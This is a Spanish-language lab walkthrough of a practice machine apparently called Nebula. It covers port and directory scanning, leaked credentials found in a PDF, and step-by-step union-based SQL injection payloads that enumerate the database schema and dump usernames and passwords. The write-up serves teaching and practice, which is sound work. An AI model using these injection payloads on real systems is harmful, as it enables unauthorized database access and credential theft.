I"˜.<h2 id="enumeracion">Enumeracion</h2>

<p>Iniciamos con un escaneo de nmap donde encontraremos el puerto 22 y 80</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nmap</span> <span class="o">-</span><span class="n">sS</span> <span class="o">-</span><span class="n">n</span> <span class="o">-</span><span class="no">Pn</span> <span class="o">-</span><span class="no">T4</span> <span class="o">--</span><span class="nb">open</span> <span class="o">-</span><span class="nb">p</span><span class="o">-</span> <span class="mf">192.168</span><span class="o">.</span><span class="mf">1.86</span> 
</code></pre></div></div>

<ul>
  <li>
    <p>sS: haga un TCP SYN Scan el cual hace que el destino responda con un RST si el puerto esta cerrado, o con un SYN/ACK si esta abierto, y ademas para que vaya mas rapido</p>
  </li>
  <li>
    <p>n: para que no haga resolucion DNS y tarde menos el escaneo</p>
  </li>
  <li>
    <p>Pn: para evitar el descubrimiento de hosts</p>
  </li>
  <li>
    <p>open: para que solo muestre los puertos abiertos</p>
  </li>
  <li>
    <p>-p-: para que escanee todo el rango de puertos</p>
  </li>
</ul>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">PORT</span>   <span class="no">STATE</span> <span class="no">SERVICE</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">ssh</span>
<span class="mi">80</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">http</span>
</code></pre></div></div>

<h3 id="directory-fuzzing">Directory Fuzzing</h3>

<p>Haciendo uso de gobuster para enumerar directorios mediante fuerza bruta, nos encontramos con <strong>img</strong>, <strong>login</strong> y <strong>joinus</strong></p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gobuster</span> <span class="n">dir</span> <span class="o">-</span><span class="n">u</span> <span class="n">http</span><span class="ss">:/</span><span class="o">/</span><span class="mf">192.168</span><span class="o">.</span><span class="mf">1.81</span><span class="o">/</span> <span class="o">-</span><span class="n">w</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">seclists</span><span class="o">/</span><span class="no">Discovery</span><span class="o">/</span><span class="no">Web</span><span class="o">-</span><span class="no">Content</span><span class="o">/</span><span class="n">directory</span><span class="o">-</span><span class="n">list</span><span class="o">-</span><span class="mf">2.3</span><span class="o">-</span><span class="n">medium</span><span class="p">.</span><span class="nf">txt</span> <span class="o">-</span><span class="n">t</span> <span class="mi">50</span>
</code></pre></div></div>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sr">/img                  (Status: 301) [Size: 310] [--&gt; http:/</span><span class="o">/</span><span class="mf">192.168</span><span class="o">.</span><span class="mf">1.81</span><span class="o">/</span><span class="n">img</span><span class="o">/</span><span class="p">]</span>
<span class="sr">/login                (Status: 301) [Size: 312] [--&gt; http:/</span><span class="o">/</span><span class="mf">192.168</span><span class="o">.</span><span class="mf">1.81</span><span class="o">/</span><span class="n">login</span><span class="o">/</span><span class="p">]</span>
<span class="sr">/joinus               (Status: 301) [Size: 313] [--&gt; http:/</span><span class="o">/</span><span class="mf">192.168</span><span class="o">.</span><span class="mf">1.81</span><span class="o">/</span><span class="n">joinus</span><span class="o">/</span><span class="p">]</span>
</code></pre></div></div>

<p>En el recurso <strong>/joinus</strong>  encontramos una seria de pasos para unirnos a ‚ÄúNebula Labs‚Äù:</p>

<p><img src="/assets/img/nebula/1.png" alt="" /></p>

<p>Si hacemos click en el hipervinculo <strong>here</strong> nos manda a la URL: <strong>http://192.168.1.81/joinus/application_form.pdf</strong></p>

<p>Bajando un poco nos encontraremos unas credenciales filtradas:</p>

<p><img src="/assets/img/nebula/2.png" alt="" /></p>

<p>Si las probamos en el login anteriormente descubierto vamos a poder iniciar sesion como admin</p>

<p>Al darle click en el boton <strong>Search Centrals</strong> nos mandara a una pagina donde podremos buscar por ID</p>

<p><img src="/assets/img/nebula/3_000.png" alt="" /></p>

<p>Al ver la URL generada despues de hacer una busqueda, podrimos intentar una SQLi: <strong>http://192.168.1.81/login/search_central.php?id=2</strong></p>

<h2 id="union-based-sql-injection">Union-Based SQL injection</h2>

<p><strong>SQLi:</strong> Vulnerabilidad que consiste en la inyeccion de consultas SQL maliciosas a travez de la entrada de un usuario a una base de datos con el fin de modificar el comportamiento de la consulta final</p>

<p>Vamos a probar un payload: <strong>search_central.php?id=2‚Äô or 1=1‚Äì -</strong> y como resultado vamos a poder ver todos los datos de la tabla actual</p>

<p><img src="/assets/img/nebula/4.png" alt="" /></p>

<p>Una vez que tenemos una SQLi, es importante saber el numero de columnas, en este caso, se puede deducir que es 3 (id, role, username), sin embargo, la manera de hacerlo es haciendo uso de la sentencia <strong>order by</strong>: ‚Äò ORDER BY 3‚Äì -, la cual hace un ordenamiento de los datos basandose en el numero que indiquemos. Sabremos el numero de columnas correcto cuando nos muestre los datos el encontrar el numero correcto, como se observa en la URL y en la tabla</p>

<p><img src="/assets/img/nebula/5.png" alt="" /></p>

<p>Ahora vamos a probar una inyeccion basada en union: <strong>search_central.php?id=2‚Äô UNION SELECT 1,2,3‚Äì -</strong>. Sabremos que es una inyeccion union-based cuando los datos de la segunda consulta se muestran en el resultado, en este caso se muestran los numeros 1, 2, 3</p>

<p><img src="/assets/img/nebula/6.png" alt="" /></p>

<h4 id="enumerar-bases-de-datos">Enumerar bases de datos</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>information_schema: es una base de datos que contiene informacion de otras bases de datos
</code></pre></div></div>

<p>Para enumerar bases de datos podemos usar <strong>information_schema.schemata</strong> e indicarle que queremos selecionar la columna <strong>schema_name</strong> que contiene el nombre de las bases de datos</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">search_central</span><span class="p">.</span><span class="nf">php?</span><span class="nb">id</span><span class="o">=</span><span class="mi">2</span><span class="err">'</span> <span class="no">UNION</span> <span class="no">SELECT</span> <span class="n">schema_name</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">null</span> <span class="no">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="nf">schemata</span><span class="o">--</span> <span class="o">-</span>
</code></pre></div></div>

<p>Podemos ver la base de datos <strong>nebuladb</strong></p>

<p><img src="/assets/img/nebula/7.png" alt="" /></p>

<h4 id="enumerar-tablas">Enumerar tablas</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>table_name: Contiene informacion de las tablas de la base de datos que se indique en table_schema (nombre de la DB)
</code></pre></div></div>

<p>Para enumerar tablas usaremos el siguiente payload que selecionara las tablas de  <strong>table_name</strong> de la base de datos que se indique en <strong>table_schema</strong></p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">search_central</span><span class="p">.</span><span class="nf">php?</span><span class="nb">id</span><span class="o">=</span><span class="mi">1</span><span class="err">'</span>  <span class="no">UNION</span> <span class="no">SELECT</span> <span class="n">table_name</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span> <span class="no">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="nf">tables</span> <span class="no">WHERE</span> <span class="n">table_schema</span><span class="o">=</span><span class="s2">"nebuladb"</span><span class="o">--</span> <span class="o">-</span>
</code></pre></div></div>

<p>Podemos ver las tablas</p>

<p><img src="/assets/img/nebula/7.png" alt="" /></p>

<h4 id="enumerar-columnas">Enumerar columnas</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>column_name: Contiene informacion de las columnas de la tabla que se indique en "table_name" de la base de datos "table_schema"
</code></pre></div></div>

<p>Para enumerar las columnas selecionarmos la columna <strong>column_name</strong> de <strong>information_schema.columns</strong> y le indicaremos la base de datos <strong>nebuladb</strong> y la tabla <strong>users</strong></p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">search_central</span><span class="p">.</span><span class="nf">php?</span><span class="nb">id</span><span class="o">=</span><span class="mi">1</span><span class="err">'</span> <span class="no">UNION</span> <span class="no">SELECT</span> <span class="n">column_name</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span> <span class="no">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="nf">columns</span> <span class="no">WHERE</span> <span class="n">table_schema</span><span class="o">=</span><span class="s2">"nebuladb"</span> <span class="no">AND</span> <span class="n">table_name</span><span class="o">=</span><span class="s2">"users"</span><span class="o">--</span> <span class="o">-</span>
</code></pre></div></div>

<p>Podemos ver las columnas <strong>username</strong> y <strong>password</strong></p>

<p><img src="/assets/img/nebula/8.png" alt="" /></p>

<h4 id="dumpear-datos">Dumpear datos</h4>

<p>Para seleccionar los datos de las tablas, es comun usar <strong>CONCAT</strong> para no sobrepasar el numero de columnas de la tabla que esta siendo usada. Pero en este caso podemos hacerlo directamente</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">'</span> <span class="no">UNION</span> <span class="no">SELECT</span> <span class="no">CONCAT</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">),</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span> <span class="no">FROM</span> <span class="n">nebuladb</span><span class="p">.</span><span class="nf">users</span><span class="o">--</span> <span class="o">-</span>        <span class="no">CONCAT</span>
</code></pre></div></div>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">'</span> <span class="no">UNION</span> <span class="no">SELECT</span> <span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="mi">3</span> <span class="no">FROM</span> <span class="n">nebuladb</span><span class="p">.</span><span class="nf">users</span><span class="o">--</span> <span class="o">-</span>                                 <span class="no">NORMAL</span>
</code></pre></div></div>

:ET